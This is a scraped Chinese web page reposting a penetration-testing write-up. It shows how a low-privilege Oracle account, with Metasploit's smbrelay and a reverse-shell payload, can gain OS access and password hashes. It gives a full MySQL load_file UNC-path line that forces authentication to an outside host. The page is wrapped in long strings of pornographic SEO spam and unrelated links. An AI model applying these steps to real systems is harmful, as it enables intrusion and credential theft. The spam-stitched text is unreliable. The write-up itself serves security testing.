婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > Oracle 低權限數據庫賬戶得到 OS 訪問權限 提權利用

Oracle 低權限數據庫賬戶得到 OS 訪問權限 提權利用

熱門標簽:沈陽400電話是如何辦理 地圖標注付款了怎么找不到了 北京營銷外呼系統廠家 北京外呼系統公司排名 外呼系統口號 貴陽智能電銷機器人官網 百度地圖標注員是干什么 溫州人工外呼系統 外呼系統鄭州

這幾天看了篇叫"Penetration: from application down to OS (Oracle)"的文檔,感覺挺有意思的,文檔的 大概意思就是說,如果 ORACLE 服務是用 administrator 賬戶啟動的,你只要有一個具有 resource 和 connect 權限的數據庫賬戶,就能利用 metasploit 的 smbrelay 功能,本地搭建一個 SMB 欺騙服務器, 來得到系統的訪問權限。我本地測試了下,還真的成功了。:-)

具體的原理分析看原文吧,我這里把我的測試過程寫出來.

我的滲透環境用的是 ubuntu8.10+metasploit 3.3 dev,oracle 數據庫版本為 10.2.0.1.0,服務啟動權限為 administrator,數據庫賬戶用的是 dbsnmp 賬戶的默認權限.0

1.先用 netstat 命令查看一下,本地的 139 端口有沒有占用,一般占用此端口的服務就是 Samba 了,要關掉。ubuntu 的關閉方法是 sudo /etc/init.d/samba stopp>1

2.運行 metasploit,我選用的 PAYLOAD 是 shell_reverse_tcp,做好相應配置后,exploit.就能用 netstat 看到本地已經監聽了 139 和 8522 端口了.

2

3

3.我現在使用 dbsnmp 默認賬戶連接到 oracle 數據庫上,這個賬戶默認權限是比較低的,只有 connect和 resource 權限。

4.然后執行下面 3 條 SQL 語句

 

5

6

7

后來經過 pt007 的提醒,我又測試了 mysql,如果服務也是 administrator 啟動的,用select load_file('\\\\192.168.1.52\mk.txt')也是可以得到系統權限的.MSSQL 應該用 xp_dirtree 存儲過程 也是可以的,不過我沒有配置出來用 administrator 賬戶啟動 MSSQL 服務,希望知道的朋友指點下我。

這個技術可以用到內網 WEB 評估的時候,如果有注入,服務又是 administrator 啟動的,可以提權了。

兩個PDF下載,

作者:Mickey
http://dsecrg.com/files/pub/pdf/Penetration_from_application_down_to_OS_(Oracle%20database).pdf
http://54mickey.googlepages.com/Penetration_fromapplication_down_to_.pdf

當執行完 create index 這句的時候,在看咱們本地的 metasploit,就已經得到 ORACLE 數據庫主機的系 統當前服務用戶的 half lm 哈希和 cmdshell 了。

您可能感興趣的文章:
  • Javascript中的幾種繼承方式對比分析
  • 淺析2種JavaScript繼承方式
  • Javascript編程中幾種繼承方式比較分析
  • JavaScript中的繼承方式詳解
  • javascript學習筆記(九)javascript中的原型(prototype)及原型鏈的繼承方式
  • JavaScript繼承方式實例
  • Linux下SVN服務器同時支持Apache的http和svnserve獨立服務器兩種模式且使用相同的訪問權限賬號
  • 深入解析yii權限分級式訪問控制的實現(非RBAC法)
  • Oracle 10g各個帳號的訪問權限、登錄路徑、監控狀態命令查詢等等
  • 127.0.0.1無法訪問,沒有權限: GetObject
  • 使用Cacls命令設置服務器文件訪問權限
  • C++ 的三種訪問權限與三種繼承方式

標簽:定西 包頭 淮北 衢州 潮州 衡水 通遼 溫州

巨人網絡通訊聲明:本文標題《Oracle 低權限數據庫賬戶得到 OS 訪問權限 提權利用》,本文關鍵詞  Oracle,低,權限,數據庫,賬戶,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《Oracle 低權限數據庫賬戶得到 OS 訪問權限 提權利用》相關的同類信息!
  • 本頁收集關于Oracle 低權限數據庫賬戶得到 OS 訪問權限 提權利用的相關信息資訊供網民參考!
  • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    韩国精品一区二区| 色综合色狠狠天天综合色| 美女mm1313爽爽久久久蜜臀| 91麻豆蜜桃一区二区三区| 久久久久国产精品麻豆ai换脸| 日韩国产一二三区| 欧美一区二区三区在线| 琪琪久久久久日韩精品| 精品裸体舞一区二区三区| 玖玖九九国产精品| 日韩欧美一区中文| 老司机精品视频在线| 2021中文字幕一区亚洲| 激情综合网天天干| 国产精品第13页| 色av成人天堂桃色av| 亚洲激情自拍偷拍| 欧美亚洲另类激情小说| 亚洲第一精品在线| 日韩手机在线导航| 国产精品一区二区三区乱码| 中文字幕一区二区三| 欧美人与z0zoxxxx视频| 久久欧美一区二区| 欧美在线小视频| 久久99精品久久久| 国产精品精品国产色婷婷| 亚洲最色的网站| 亚洲人成网站影音先锋播放| 国产精品入口麻豆九色| 中文字幕在线不卡| 亚洲一区av在线| 亚洲成av人片一区二区| 日韩成人精品在线观看| 美女免费视频一区| 极品美女销魂一区二区三区| 成人亚洲一区二区一| 国产成人免费9x9x人网站视频| 亚洲乱码国产乱码精品精的特点| 欧美性猛片aaaaaaa做受| 欧美亚洲国产一卡| 国产传媒一区在线| 久久久国产精华| 亚洲成人动漫精品| 亚洲精品国产成人久久av盗摄| 国产成人啪午夜精品网站男同| 国产精品久久久久久久第一福利| 丁香天五香天堂综合| www久久精品| 成人av在线播放网站| 欧美激情在线观看视频免费| 欧美成人女星排行榜| 欧美影院一区二区| 欧美激情一区二区在线| 国产精品美女久久久久久久久| 亚洲激情校园春色| 国产一区二区三区四| 91丨porny丨在线| 欧美xfplay| 一区二区三区.www| 国产一区视频网站| 欧美精品色一区二区三区| 国产嫩草影院久久久久| 日韩极品在线观看| 91一区一区三区| xfplay精品久久| 欧美日韩激情一区二区| 555夜色666亚洲国产免| 日本精品免费观看高清观看| 555夜色666亚洲国产免| 中文字幕一区二区视频| 日韩电影在线观看电影| 福利一区二区在线| 欧美一区二区在线播放| 亚洲欧洲精品一区二区三区不卡| 蜜臀精品久久久久久蜜臀 | 日韩欧美一级在线播放| 国产精品网站导航| 青椒成人免费视频| 欧美三级午夜理伦三级中视频| 中文字幕中文字幕一区| 国产一区二区精品久久99 | 国产精品人妖ts系列视频| 国产综合色视频| 91婷婷韩国欧美一区二区| 久久久精品tv| 久久成人av少妇免费| 欧美日韩久久一区二区| av一区二区久久| 国产精品无人区| 国产99精品国产| 日本不卡不码高清免费观看| 99re热视频这里只精品 | 国产一区二区美女诱惑| 国产一区二区成人久久免费影院| 日韩免费一区二区| 国产精品美女一区二区| 亚洲色图视频免费播放| 亚洲国产欧美在线| 国产综合久久久久影院| 99精品欧美一区| 91精品国产综合久久久久久久| 欧美成人猛片aaaaaaa| 国产精品亲子乱子伦xxxx裸| 婷婷一区二区三区| www.在线成人| 日韩久久精品一区| 亚洲精品你懂的| 国内精品写真在线观看| 色婷婷精品大在线视频| 久久综合色婷婷| 亚洲一区二区偷拍精品| 国产福利一区二区三区| 欧美一区二区在线看| 一区二区三区视频在线观看| 国产福利一区二区三区视频在线| 5月丁香婷婷综合| 亚洲国产cao| 91麻豆国产福利在线观看| 精品美女一区二区| 无码av中文一区二区三区桃花岛| 高清不卡在线观看| 国产欧美日韩视频在线观看| 丝袜美腿亚洲一区二区图片| 91久久一区二区| 亚洲天堂a在线| 成人av网址在线观看| 2024国产精品| 国产综合成人久久大片91| 久久夜色精品一区| 精品一区二区免费视频| 日韩免费一区二区| 久久 天天综合| 精品人在线二区三区| 美脚の诱脚舐め脚责91| 日韩精品资源二区在线| 秋霞影院一区二区| 欧美丰满高潮xxxx喷水动漫| 天天av天天翘天天综合网 | 久久久久久电影| 激情综合色播五月| 精品欧美一区二区在线观看| 日本高清成人免费播放| 亚洲欧洲精品一区二区三区| 久久久久久久久一| 久久日韩精品一区二区五区| 欧美久久久久中文字幕| 欧洲视频一区二区| 一本久久综合亚洲鲁鲁五月天| 成人午夜在线播放| 首页国产欧美久久| 日韩免费高清av| 日本一区二区不卡视频| 国产成人综合在线观看| 中文字幕精品—区二区四季| 国产综合久久久久久鬼色| 国产欧美视频一区二区| 99久久国产综合精品麻豆| 一级特黄大欧美久久久| 制服丝袜亚洲色图| 麻豆成人久久精品二区三区小说| 精品播放一区二区| 99re这里只有精品6| 午夜精品久久久久久不卡8050| 精品久久久久久综合日本欧美 | 亚洲成人免费av| 日韩一级二级三级精品视频| 国产在线视频一区二区| 午夜精品123| 精品久久人人做人人爽| 国产精品99久久久久久久女警 | 国产精品久久99| 欧美日韩黄视频| 国产一区二区三区在线观看免费视频 | 日本大胆欧美人术艺术动态| 欧美一区二区在线观看| 成人午夜电影小说| 亚洲国产乱码最新视频| 久久久久久久久久电影| 在线这里只有精品| 国内精品在线播放| 性做久久久久久免费观看| 久久久久高清精品| 欧美日韩在线精品一区二区三区激情| 免费欧美在线视频| 亚洲免费成人av| 久久久91精品国产一区二区精品| 在线观看视频一区二区| 国产精品一区二区免费不卡| 亚洲成人一区在线| 亚洲美女偷拍久久| 国产亚洲1区2区3区| 欧美人动与zoxxxx乱| 波多野结衣视频一区| 激情图片小说一区| 午夜av电影一区| 亚洲国产精品一区二区久久恐怖片| 久久精品视频免费| 日韩欧美成人一区| 欧美日韩在线精品一区二区三区激情|